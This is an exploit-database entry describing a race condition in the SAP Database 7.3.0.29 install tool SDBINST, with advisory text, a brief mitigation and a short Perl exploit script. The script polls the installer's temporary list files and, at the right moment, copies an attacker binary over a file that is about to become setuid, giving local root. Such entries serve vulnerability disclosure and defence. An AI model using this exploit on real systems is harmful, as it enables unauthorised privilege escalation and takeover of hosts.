SAP Database SDBINST Race Condition Vulnerability

vendor:

Database

by:

SecurityFocus

7.2

CVSS

HIGH

Race Condition

362

CWE

Product Name: Database

Affected Version From: 7.3.0.29

Affected Version To: 7.3.0.29

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2002

SAP Database SDBINST Race Condition Vulnerability

It has been reported that the SAP Database install tool SDBINST may perform operations non-atomically when installing the SAP database. This condition may open a window of opportunity for a malicious user to replace one of two SAP Database files with a malicious file, before SBDINST sets the setuid bit on the files. An attacker may exploit this vulnerability to gain root privileges.

Mitigation:

Ensure that the SAP Database install tool SDBINST is configured to perform operations atomically when installing the SAP database.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7421/info

SAP Database SDBINST has been reported prone to a race condition vulnerability.

It has been reported that the SAP Database install tool SDBINST may perform operations non-atomically when installing the SAP database. This condition may open a window of opportunity for a malicious user to replace one of two SAP Database files with a malicious file, before SBDINST sets the setuid bit on the files.

An attacker may exploit this vulnerability to gain root privileges. 

#!/bin/perl

while (1) {

$test =`grep -sh PRECOM.ins
/tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;

if ( $test =~ /PRECOM/ ) {
system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver");
exit(1);
}

}